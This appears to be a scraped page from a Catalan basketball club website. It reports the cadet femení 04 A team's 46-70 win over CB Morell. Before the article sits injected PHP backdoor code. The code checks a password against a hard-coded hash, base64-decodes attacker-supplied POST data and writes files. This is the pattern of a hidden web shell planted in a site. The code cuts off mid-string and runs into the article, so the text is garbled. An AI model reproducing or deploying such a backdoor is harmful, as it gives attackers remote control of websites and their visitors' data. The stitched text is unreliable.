function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 A gestiona bé les rotacions i guanya el CB Morell (46-70) - Tgn Bàsquet Club -

El cadet femení 04 A gestiona bé les rotacions i guanya el CB Morell (46-70)

Updated: febrer 5, 2019

L’equip cadet femení 04 A va vèncer el CB Morell en un partit no exempt de dificultats. Les noies que entrena Albert del Rey havien encaixat dues derrotes seguides i arribaven al matx amb necessitat de victòries. Tot i això, l’inici no va ser gaire bo i el partit estava igualat. En el segon període, la rotació de banqueta del tècnic visitant va permetre aportar aire fresc a l’equip a la pista, que patia contra una defensa molt tancada de les locals (parcial 11-29 al segon període). Tot i que hi va haver una davallada en el tercer quart, el TGN Bàsquet va retrobar el seu millor joc en el quart període.